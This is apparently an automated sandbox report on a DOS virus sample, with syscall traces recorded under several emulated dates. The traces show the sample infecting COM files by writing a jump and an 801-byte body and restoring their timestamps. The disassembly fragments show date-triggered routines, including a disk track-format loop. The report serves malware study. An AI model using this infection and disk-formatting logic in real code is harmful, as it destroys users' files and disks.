Sample viewer

vx.netlux.org/Virus.DOS.Project.801

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:31:36.66500678Z 26 PC: 15157 | Set disk transfer address
2018-12-17T22:31:36.66662751Z 26 PC: 15171 | Set disk transfer address
2018-12-17T22:31:36.668450869Z 71 PC: 1517b | Get current directory
2018-12-17T22:31:36.671984283Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-17T22:31:36.674814682Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-17T22:31:36.678572548Z 78 PC: 1519f | Find first file
2018-12-17T22:31:36.685375312Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:36.692872865Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:31:36.708793454Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:31:36.716531042Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-17T22:31:36.720056777Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.723182077Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-17T22:31:36.745760492Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.747422253Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.756427027Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.7594344Z 61 PC: 15259 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:36.766880469Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 6)
2018-12-17T22:31:36.774389833Z 61 PC: 15259 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:31:36.782438361Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 7)
2018-12-17T22:31:36.786103981Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.788256923Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 7)
2018-12-17T22:31:36.798243004Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.800328785Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.8101284Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.81412887Z 61 PC: 15259 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:36.821676167Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 7)
2018-12-17T22:31:36.829075752Z 61 PC: 15259 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:31:36.837514641Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 8)
2018-12-17T22:31:36.841037893Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.843049126Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 8)
2018-12-17T22:31:36.853277391Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.855158806Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.863853364Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.867920963Z 61 PC: 15259 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:36.875795644Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 8)
2018-12-17T22:31:36.883060912Z 61 PC: 15259 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:31:36.891116285Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 9)
2018-12-17T22:31:36.895034141Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.897013827Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 9)
2018-12-17T22:31:36.90624874Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.913830812Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.922626569Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.925551046Z 61 PC: 15259 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:31:36.935647236Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 9)
2018-12-17T22:31:36.943401077Z 61 PC: 15259 | Open file (Filename = 'PRINTA~1.COM�')
2018-12-17T22:31:36.948926283Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 2)
2018-12-17T22:31:36.953101963Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.95560664Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 2)
2018-12-17T22:31:36.959302001Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:36.962161984Z 62 PC: 1524d | Close file
2018-12-17T22:31:36.964447364Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:36.968021543Z 61 PC: 15259 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:36.976177094Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)
2018-12-17T22:31:36.983855386Z 61 PC: 15259 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:31:36.99172331Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 10)
2018-12-17T22:31:36.995260072Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:36.998179415Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 10)
2018-12-17T22:31:37.008729548Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:37.010895133Z 62 PC: 1524d | Close file
2018-12-17T22:31:37.020425707Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.023379896Z 61 PC: 15259 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:37.030727516Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 10)
2018-12-17T22:31:37.039082516Z 61 PC: 15259 | Open file (Filename = 'PAH.COM')
2018-12-17T22:31:37.046572776Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 11)
2018-12-17T22:31:37.04983548Z 66 PC: 1522f | Move file pointer
2018-12-17T22:31:37.052010766Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 11)
2018-12-17T22:31:37.060956501Z 87 PC: 15249 | Get or set file date and time
2018-12-17T22:31:37.06324295Z 62 PC: 1524d | Close file
2018-12-17T22:31:37.073381682Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.076469927Z 61 PC: 15259 | Open file (Filename = 'TEST.COM')
2018-12-17T22:31:37.083816536Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 11)
2018-12-17T22:31:37.086735552Z 79 PC: 151a8 | Find next file
2018-12-17T22:31:37.089688456Z 59 PC: 151b5 | Change current directory
2018-12-17T22:31:37.094291826Z 59 PC: 1518c | Change current directory
2018-12-17T22:31:37.096186554Z 26 PC: 15193 | Set disk transfer address
2018-12-17T22:31:37.098494358Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-17T22:31:37.108340996Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":30,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.550343762Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.552169527Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.553494908Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.556412823Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.566273489Z 9 PC: 15275 | Display string (Could not find end pointer)
2018-12-25T11:55:04.571510032Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.573651184Z 78 PC: 1519f | Find first file
2018-12-25T11:55:04.58194859Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:04.588729923Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:04.594794965Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:04.601442742Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:04.603953568Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:04.605146507Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.641473586Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.643365026Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.65075047Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.654212532Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.671717835Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.677984443Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.684987419Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.689057745Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.690809294Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.69938738Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.701558701Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.71031587Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.713722507Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.722575103Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.729698361Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.736799167Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.740513231Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.742036241Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.751219438Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.753405595Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.761772417Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.764326454Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.772351798Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.779301206Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.786073845Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.790757388Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.792222684Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.800205811Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.802750485Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.811046908Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.813536193Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.821024875Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.82741081Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.831984816Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.835485234Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.836912078Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.839671043Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.84135694Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.844252726Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.847104991Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.85433241Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.861670918Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.868126388Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.871132047Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.873041939Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.881447636Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.883156733Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.890649255Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.893053123Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.899273661Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.905741214Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.912668455Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.915280519Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.917109857Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.925232679Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.926908835Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.934899209Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.937274538Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.943606982Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.946635907Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.949061924Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:05.95299502Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:05.956121818Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:05.957231111Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:05.96085694Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.573872676Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.575598482Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.576814024Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.579613603Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.583026389Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.587509804Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:04.593701705Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:04.651266553Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:04.652921073Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:04.65390998Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:04.656546041Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:04.659423192Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:04.664381613Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:04.670402182Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.386499115Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.388108886Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.389195466Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.39214431Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.394835501Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.397094281Z 78 PC: 1519f | Find first file
2018-12-25T11:55:05.403593686Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:05.411744074Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:05.418835592Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.426504776Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:05.430335686Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:05.431925839Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.447646021Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.450034113Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.458949841Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.46206236Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.469323529Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.477684901Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.485889702Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.489087242Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.491299608Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.5009681Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.502525195Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.511779274Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.51517596Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.522994981Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.531306807Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.539486015Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.542567251Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.545447174Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.55475475Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.556505078Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.566368083Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.569655845Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.576874905Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.584005736Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.591565565Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.594535835Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.595998637Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.605897558Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.607660422Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.616498718Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.620094866Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.627304974Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.634385598Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.640277191Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.643482818Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.645358599Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.64935357Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.651584721Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.65394566Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.657904294Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.665582105Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.673294313Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.680951406Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.684098871Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.6926504Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.703062203Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.704907548Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.713589045Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.716432486Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.724017584Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.731556935Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.739857021Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.744440577Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.746454595Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.756072728Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.758740612Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:05.767793149Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.770724338Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.779062138Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.781935308Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:05.784621066Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:05.790173516Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:05.792191861Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:05.793513123Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:05.803078762Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.576860475Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.579186744Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.581126612Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.584153484Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.586415381Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.59190209Z 61 PC: 15259 | Open file (Filename = 'HOSTA.COM')
2018-12-25T11:55:05.59945699Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 2)

{"DateBased":true,"Day":30,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:05.879164658Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:05.880872659Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:05.882206147Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:05.885002077Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:05.895367092Z 9 PC: 15275 | Display string (Could not find end pointer)
2018-12-25T11:55:05.900540569Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
